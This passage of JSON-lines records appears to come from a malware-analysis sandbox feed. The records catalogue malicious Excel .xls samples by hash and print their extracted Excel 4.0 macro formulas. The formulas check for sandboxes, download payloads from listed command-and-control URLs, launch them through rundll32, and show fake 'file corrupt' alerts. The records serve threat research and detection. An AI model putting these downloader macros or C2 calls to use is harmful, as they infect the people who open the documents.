Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"575d86795a58b332c8511fedae8baa9d68503a8ab4e424abf4a1109382ee5149"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"575d86795a58b332c8511fedae8baa9d68503a8ab4e424abf4a1109382ee5149","filesize":113664,"md5":"0e9e134493d6615e5d38f776d61f6774","sha1":"2695999456d2701d73d8aa83b41867245117efa5","sha256":"575d86795a58b332c8511fedae8baa9d68503a8ab4e424abf4a1109382ee5149","sha512":"10af6bb2054c9638636846143509ea2cb854a19eca2169d92df40375dabfc0e180920620fbdd9aca7dea76cb1bc32b5c169a575673072a98a78e0cb8084298d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"575d86795a58b332c8511fedae8baa9d68503a8ab4e424abf4a1109382ee5149.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6hbmrzstRW\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5769d44cc70ee5be0c805f7705cc1d64083be128356a3f9a792012509e603713"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"5769d44cc70ee5be0c805f7705cc1d64083be128356a3f9a792012509e603713","filesize":225280,"md5":"fcace39b038c2efb9fc59d36c79e3241","sha1":"22cd7d399e829bcd1a3fb5c20d1951cbe6c5bef2","sha256":"5769d44cc70ee5be0c805f7705cc1d64083be128356a3f9a792012509e603713","sha512":"3b5bd5e84bcd78849e41e56b4b243da444f8c447d469f27c6bc45d795899b2e8920763e7ba033efb045f19a55e9521af94aa1b3ea30b139a0aa522726c0e83bb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5769d44cc70ee5be0c805f7705cc1d64083be128356a3f9a792012509e603713.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iJ1vdSt778\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"57758d70bb3cfdcb824b52076bd7e71916b0fce5d7476be2e5444a57fe426db1"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"57758d70bb3cfdcb824b52076bd7e71916b0fce5d7476be2e5444a57fe426db1","filesize":185344,"md5":"f3466e118b553b19a45264eccedcfb73","sha1":"595531761bad36393a415fdc42874e13d2c86d7f","sha256":"57758d70bb3cfdcb824b52076bd7e71916b0fce5d7476be2e5444a57fe426db1","sha512":"583e1664c7591c031dcf481fb58392c2bfd91be30c5766f0a1055cc420a7914c93df611b4e33815f7749d570c8b143fbbca94a93bb2d0c220dbf96d7b6b50037","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"57758d70bb3cfdcb824b52076bd7e71916b0fce5d7476be2e5444a57fe426db1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"578c8f4560659aa79e55fb06992bae8f469dfff7f32f6d4813b8183893e66cf1"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"578c8f4560659aa79e55fb06992bae8f469dfff7f32f6d4813b8183893e66cf1","filesize":113664,"md5":"b97ad80df6445897e296406438a95706","sha1":"24f16193ecac5e141477c18ee02e330c63f5b0cf","sha256":"578c8f4560659aa79e55fb06992bae8f469dfff7f32f6d4813b8183893e66cf1","sha512":"a570e8e4ae2ff1c125e227f84bf916542342de60ba5ef7434690f02d24a86633b37c555c281f4d6a4d7f55006aaa207f7e08a57911b8b5e2d86e16cff3e3f6e2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"578c8f4560659aa79e55fb06992bae8f469dfff7f32f6d4813b8183893e66cf1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rZx8TLgz1q\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"57a69fb7011ef5203d57029fa866926de794c82e3559c129e04de8444e458e80"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"57a69fb7011ef5203d57029fa866926de794c82e3559c129e04de8444e458e80","filesize":147968,"md5":"ffcb53d6d0290f1099894c2e62464ac8","sha1":"e9d4877fd233e32fb40d0797fb467f28a2eb2548","sha256":"57a69fb7011ef5203d57029fa866926de794c82e3559c129e04de8444e458e80","sha512":"52b2ebb8c9c21729c0a2f9f5c3dce28f03b19cd17e4688441f6987391bca3a902d6d0b14195699502c9f67e974a3222f099e341c41dc20662904771cdf48049a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"57a69fb7011ef5203d57029fa866926de794c82e3559c129e04de8444e458e80.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"3v8mfqO5RJ\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"57ce0e3f5a4bdd7ecf734c31f95ce54f4d3558398c5db54115ad143b0ae34548"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"57ce0e3f5a4bdd7ecf734c31f95ce54f4d3558398c5db54115ad143b0ae34548","filesize":109568,"md5":"4a425c57975aac8094a57b7435755b6c","sha1":"2e5f2eecb823f53a8457378105f7a6e89d66db93","sha256":"57ce0e3f5a4bdd7ecf734c31f95ce54f4d3558398c5db54115ad143b0ae34548","sha512":"0b416c27206da76e63430009b9da2d21c232f5daf3fd0f2a3d982da0c46ef0828feb713887c0d4e4fc49b3b1446305298b69ccd2eabb240b7c7862c5984bbf0f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"57ce0e3f5a4bdd7ecf734c31f95ce54f4d3558398c5db54115ad143b0ae34548.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"Wc3B6p4psk\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"57cf27010ff12f88c0b0794c4c10491317bceed815caacd5bd5a12b0cbca1c57"},"analysis":{"reported":"2020-04-09T16:16:23Z","score":10},"files":[{"filename":"57cf27010ff12f88c0b0794c4c10491317bceed815caacd5bd5a12b0cbca1c57","filesize":168448,"md5":"2264e7894f3cbcb8a8c7e3ea7738b3e9","sha1":"bebfefc439b7361fd922f380793248cccd5d4e34","sha256":"57cf27010ff12f88c0b0794c4c10491317bceed815caacd5bd5a12b0cbca1c57","sha512":"edb693d10260bc98e1290637f3ad3f7a5d385028f685bcce9a57bb42bec0b1de6627a91fced151913d762d11c7e603ba1d4e313aad10f9001ff6f69e7614f0ef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"57cf27010ff12f88c0b0794c4c10491317bceed815caacd5bd5a12b0cbca1c57.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"N4kFVDYcIr\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"57de7e20023d3c2df04eb56e542745505ba8b418b999d3cc3ce23276db8d393a"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"57de7e20023d3c2df04eb56e542745505ba8b418b999d3cc3ce23276db8d393a","filesize":112128,"md5":"6f95c5a7da957b174a9731b086ea4232","sha1":"ec2e1be2869fb565917edf389e6bea85898b8679","sha256":"57de7e20023d3c2df04eb56e542745505ba8b418b999d3cc3ce23276db8d393a","sha512":"9235b6953b320eecc444db8cb6126108fefafb3d7efae15c5d2956aacef221f6022befef486521e959bdf1b8064c324c225780b71d3e12009414ff0c9e69cfa5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"57de7e20023d3c2df04eb56e542745505ba8b418b999d3cc3ce23276db8d393a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"57e92e27c033046923457b5c8e70c051647b3f93931ce0fe6470291bfc32fe4f"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"57e92e27c033046923457b5c8e70c051647b3f93931ce0fe6470291bfc32fe4f","filesize":141824,"md5":"4ce6e017577fb08bb6eed9fa1f0ebdb2","sha1":"f96b84d5301429086043a7b1110fb6a44cc7bc78","sha256":"57e92e27c033046923457b5c8e70c051647b3f93931ce0fe6470291bfc32fe4f","sha512":"5ffab32d289b0813d1d3ead8be74dde7a3f1dd224c9521c2a7ad9dbcc7a69bc9f9dd550f445f31d6233e0c264587a7e48de85692900431ad39a5c8ea183e357b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"57e92e27c033046923457b5c8e70c051647b3f93931ce0fe6470291bfc32fe4f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"a6TTYA1JAk\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"581ecd7fbc56d8194179d6cd0e99a7d744f9d3cd74f30154af737e0917dceacc"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"581ecd7fbc56d8194179d6cd0e99a7d744f9d3cd74f30154af737e0917dceacc","filesize":167936,"md5":"4ef1fd46d72e2c2d1d957cd4632fde99","sha1":"854193194f344498dfec8911140889d6669e23ba","sha256":"581ecd7fbc56d8194179d6cd0e99a7d744f9d3cd74f30154af737e0917dceacc","sha512":"dac82a753149c57b9992d2bd2baef4820609dfddf61223f2f3f2da166b12d1c0c84839746ca2fb2f46e6b50af119df635402d01251e94e8d7008652b17407c5a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"581ecd7fbc56d8194179d6cd0e99a7d744f9d3cd74f30154af737e0917dceacc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BFa8pn3BTQ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"582ba9bd1b24071554e533b78cc12960333bba35306803d178dc1244a8d6a2de"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"582ba9bd1b24071554e533b78cc12960333bba35306803d178dc1244a8d6a2de","filesize":170496,"md5":"306da2e72482456b9ff5b5376c89c677","sha1":"ad05956938064a89dba49e92b3e053c982ca770d","sha256":"582ba9bd1b24071554e533b78cc12960333bba35306803d178dc1244a8d6a2de","sha512":"c1c0b8e2877b560311823f22f71a668b188ca955cb8305809a85f21d88fc7cb6fe6fc7ae5194eda8196a0d6b3d4597d76b20535db3c44c2b70bba04d5f646bff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"582ba9bd1b24071554e533b78cc12960333bba35306803d178dc1244a8d6a2de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yzSWM5cNhl\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5837bae791de8823d93db9e1991b3331637ff62e1330017f2f098b98526fc8df"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"5837bae791de8823d93db9e1991b3331637ff62e1330017f2f098b98526fc8df","filesize":170496,"md5":"0d9cb629780ff7eeb72245195a20e0b1","sha1":"2990e4713ca3bb285d55ff8af21caec7850d8041","sha256":"5837bae791de8823d93db9e1991b3331637ff62e1330017f2f098b98526fc8df","sha512":"1f8667e5b70c21891485b02eb52c9bc3ebfe49dc934bfe8eff5d60f79575b76b1bae59bd87cb25219cd6159715f71865bbfc4390dc710533722ba4b8309f0222","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5837bae791de8823d93db9e1991b3331637ff62e1330017f2f098b98526fc8df.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LSFLXLd1mW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"583c5ace73cfa87aabc481eea9f62f9c2a62dfde5c595eee7bfdd8de9ef63165"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"583c5ace73cfa87aabc481eea9f62f9c2a62dfde5c595eee7bfdd8de9ef63165","filesize":116224,"md5":"cf219c4894a304fcda59dadc272b9ab1","sha1":"7dc2beac10230efa9b0ea71ff7245c6272ef34ed","sha256":"583c5ace73cfa87aabc481eea9f62f9c2a62dfde5c595eee7bfdd8de9ef63165","sha512":"7b0493f19fafcbdeb79c447660eda3cb00ec4bec2e93ad4d4fa966ba04147f248d69d78cba0f056da24387b1d7b05a1c249ec87efcad5a6f5bf4a68a194bed43","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"583c5ace73cfa87aabc481eea9f62f9c2a62dfde5c595eee7bfdd8de9ef63165.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PqiDXNqA69\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"584739a883e11667dc3c71c134cc6afd4082619aded24f8c444d64d7cc55f69d"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"584739a883e11667dc3c71c134cc6afd4082619aded24f8c444d64d7cc55f69d","filesize":113664,"md5":"31d793c1c54d97eafffade3d97bf1be3","sha1":"6d969e0281704ef4230970798623c6d2f6cc8275","sha256":"584739a883e11667dc3c71c134cc6afd4082619aded24f8c444d64d7cc55f69d","sha512":"bb20f74f7ef7c4443cb553ab3087e0a1ca25cc53dd51fb51dfc6ea9b4dbd48a88f0beba06dc317c8daf97dcc9c5bfa41cb7d03de872f80cc8b1541190a9a1f0d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"584739a883e11667dc3c71c134cc6afd4082619aded24f8c444d64d7cc55f69d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"M9qmZy1mje\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"58513a80ff2f591dffd83bae6c6078f5fb2c3bd1773d3909fc71fb42a7f6c04b"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"58513a80ff2f591dffd83bae6c6078f5fb2c3bd1773d3909fc71fb42a7f6c04b","filesize":152576,"md5":"473183bac2cfbb5c6fef293b20b173e2","sha1":"c3fb2592412ad8bf1d2100234dc856265243e5d6","sha256":"58513a80ff2f591dffd83bae6c6078f5fb2c3bd1773d3909fc71fb42a7f6c04b","sha512":"c749d98fb784b0e63c1cccbbf8c1e60c071cb790d26b36fe4f15a1a9e4a355d69042e0b6c9d69ef8b7c4f17f8755048fa963f1d40ecf722dcbd0ee87c8ff708c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"58513a80ff2f591dffd83bae6c6078f5fb2c3bd1773d3909fc71fb42a7f6c04b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8WNWP6nT5U\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5853f57c3be65f2e1f833083901b376b14748df052c6dd7a1e403ba49da60f9b"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"5853f57c3be65f2e1f833083901b376b14748df052c6dd7a1e403ba49da60f9b","filesize":113664,"md5":"2bb96f30bef483dd0f2e92a5babfa199","sha1":"b746fb80932a3e529e4dc09a3de61753dcf3183e","sha256":"5853f57c3be65f2e1f833083901b376b14748df052c6dd7a1e403ba49da60f9b","sha512":"399cd62f13e2155077103f2e802564a9a566a50117a20960b02b5962836ec51779ef3367959a586650ecb2279d73618effca51aec41c0d26eb716d66b37178e9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5853f57c3be65f2e1f833083901b376b14748df052c6dd7a1e403ba49da60f9b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 